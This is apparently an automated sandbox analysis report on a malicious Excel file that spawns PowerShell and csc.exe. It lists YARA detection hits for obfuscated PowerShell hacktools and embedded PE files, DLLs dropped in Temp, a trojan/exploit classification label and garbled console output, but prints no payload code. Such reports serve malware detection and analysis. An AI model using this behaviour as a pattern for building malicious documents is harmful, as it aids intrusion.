Source: 00000009.00000002.1774181408.00287000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1774965388.00530000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1672911724.00080000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1677284178.01BB0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1775135148.00620000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1775563713.012C0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1774443824.00470000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1673377572.01260000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000000.1635094604.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000002.1774225767.002D0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1650835635.00360000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000000.1705388458.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1679114701.04400000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1672890417.00060000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000E.00000002.1736973475.00370000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000003.1713665934.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1673047466.00190000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1774008438.000D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1673224653.01080000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1777041758.01AE0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1774035610.000D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1781520586.04430000.00000004.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1781679900.04480000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1673691174.01640000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1774465519.004C0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1674343739.019B0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1776428355.01790000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000D.00000002.1736577833.00330000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1780569437.03F60000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1780905680.03FA0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Users\user\AppData\Local\Temp\3ndkwphw.dll, type: DROPPED	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Users\user\AppData\Local\Temp\h2oah0u7.dll, type: DROPPED	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Users\user\AppData\Local\Temp\ua6j8io5.dll, type: DROPPED	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4370000.6.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1880000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.4430000.5.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.60000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4480000.6.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.45c0000.6.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4430000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.260000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 14.2.csc.exe.370000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4400000.7.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4430000.5.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.csc.exe.360000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4c0000.2.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4370000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.4430000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.19b0000.4.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 13.2.csc.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.470000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1880000.3.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3f60000.4.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.3fa0000.4.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.45c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.260000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3ea0000.3.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4480000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.1ae0000.3.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 13.2.csc.exe.330000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 14.2.csc.exe.370000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.csc.exe.360000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.1790000.2.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1bb0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.1ae0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3ea0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3f60000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.19b0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.3fa0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1640000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4c0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.1790000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1640000.2.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1bb0000.5.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs

Classification label

Show sources

Source: classification engine

Classification label: mal88.troj.expl.evad.winXLS@25/38@6/3

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Excel

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVR6A81.tmp

Jump to behavior

Document contains an OLE Workbook stream indicating a Microsoft Excel file

Show sources

Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls

OLE indicator, Workbook stream: true

Found command line output

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..N......3Un,...#........3Un....@.m.L\|Tn.......l$(Zn...l..e.L\|Tn.............7Unp.....Tn@.m.H.&.......N.....$(Zn..Tn....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......#.....&.....A.Xwt...............a.Xw..0.................7W..................#.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..N.....4......./...H.&.....A.Xw4...............a.Xw..0................._W................../.........N.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t......./.....&.....A.Xwt...............a.Xw..0.................zW................../.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........4.......;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2.7..................W..................;...........$.....Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......;.....&.....A.Xwt...............a.Xw..0..................W..................;.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..N.....4.......G...H.&.....A.Xw4...............a.Xw..0..................W..................G.........N.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......G.....&.....A.Xwt...............a.Xw..0..................X..................G.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..N.....4.......S...H.&.....A.Xw4...............a.Xw..0.................(X..................S.........N.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......S.....&.....A.Xwt...............a.Xw..0.................CX..................S.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..N.....4......._...H.&.....A.Xw4...............a.Xw..0.................kX.................._.........N.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t......._.....&.....A.Xwt...............a.Xw..0..................X.................._.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..N.....4.......k...H.&.....A.Xw4...............a.Xw..0..................X..................k.........N.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......k.....&.....A.Xwt...............a.Xw..0..................X..................k.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..N.....4.......w...H.&.....A.Xw4...............a.Xw..0..................X..................w.........N.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......w.....&.....A.Xwt...............a.Xw..0..................Y..................w.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..N.....4...........H.&.....A.Xw4...............a.Xw..0.................4Y............................N.f.....Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.............&.....A.Xwt...............a.Xw..0.................OY..........................T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........4........... .&.....A.Xw4...............a.Xw..0.................wY....................................Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.............&.....A.Xwt...............a.Xw..0..................Y..........................T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..H......3`k,...#........3`k....@.<.L\|_k.......l$(ek...l.$A.L\|_k.............7`kp....._k@.<.X.2.......H.....$(ek.._k....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......#.....2.....A.Xwt...............a.Xw..0.....................................#.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..H.....4......./...X.2.....A.Xw4...............a.Xw..0...................................../.........H.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t......./.....2.....A.Xwt...............a.Xw..0...................................../.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........4.......;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2.7.....................................;...........$.....Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......;.....2.....A.Xwt...............a.Xw..0................. ...................;.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..H.....4.......G...X.2.....A.Xw4...............a.Xw..0.................H...................G.........H.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......G.....2.....A.Xwt...............a.Xw..0.................c...................G.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..H.....4.......S...X.2.....A.Xw4...............a.Xw..0.....................................S.........H.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......S.....2.....A.Xwt...............a.Xw..0.....................................S.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..H.....4......._...X.2.....A.Xw4...............a.Xw..0....................................._.........H.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t......._.....2.....A.Xwt...............a.Xw..0....................................._.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..H.....4.......k...X.2.....A.Xw4...............a.Xw..0.....................................k.........H.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......k.....2.....A.Xwt...............a.Xw..0.................,...................k.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..H.....4.......w...X.2.....A.Xw4...............a.Xw..0.................T...................w.........H.......Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.......w.....2.....A.Xwt...............a.Xw..0.....................................w.......T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..H.....4...........X.2.....A.Xw4...............a.Xw..0...............................................H.f.....Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.............2.....A.Xwt...............a.Xw..0.............................................T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........4........... .2.....A.Xw4...............a.Xw..0.................;.....................................Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t.............2.....A.Xwt...............a.Xw..0.................V...........................T.........Ww........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..V......3`k....#........3`k....@.\.L\|_k.......l$(ek...l..V.L\|_kd............7`k......_k@.\.X>A.......V.....$(ek.._k....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...#.....A.x...A.Xw................a.Xw..0.....D...............................#.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..V.........l.../...X>A.8...A.Xw................a.Xw..0.....D.............................../.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l.../.....A.x...A.Xw................a.Xw..0.....D.............................../.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2.7.....D...............................;.......t...$.....Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...;.....A.x...A.Xw................a.Xw..0.....D...............................;.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..V.........l...G...X>A.8...A.Xw................a.Xw..0.....D...............................G.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...G.....A.x...A.Xw................a.Xw..0.....D...........$...................G.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..V.........l...S...X>A.8...A.Xw................a.Xw..0.....D...........L...................S.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...S.....A.x...A.Xw................a.Xw..0.....D...........g...................S.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..V.........l..._...X>A.8...A.Xw................a.Xw..0.....D..............................._.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l..._.....A.x...A.Xw................a.Xw..0.....D..............................._.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..V.........l...k...X>A.8...A.Xw................a.Xw..0.....D...........s...................k.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...k.....A.x...A.Xw................a.Xw..0.....D...............................k.................Ww........
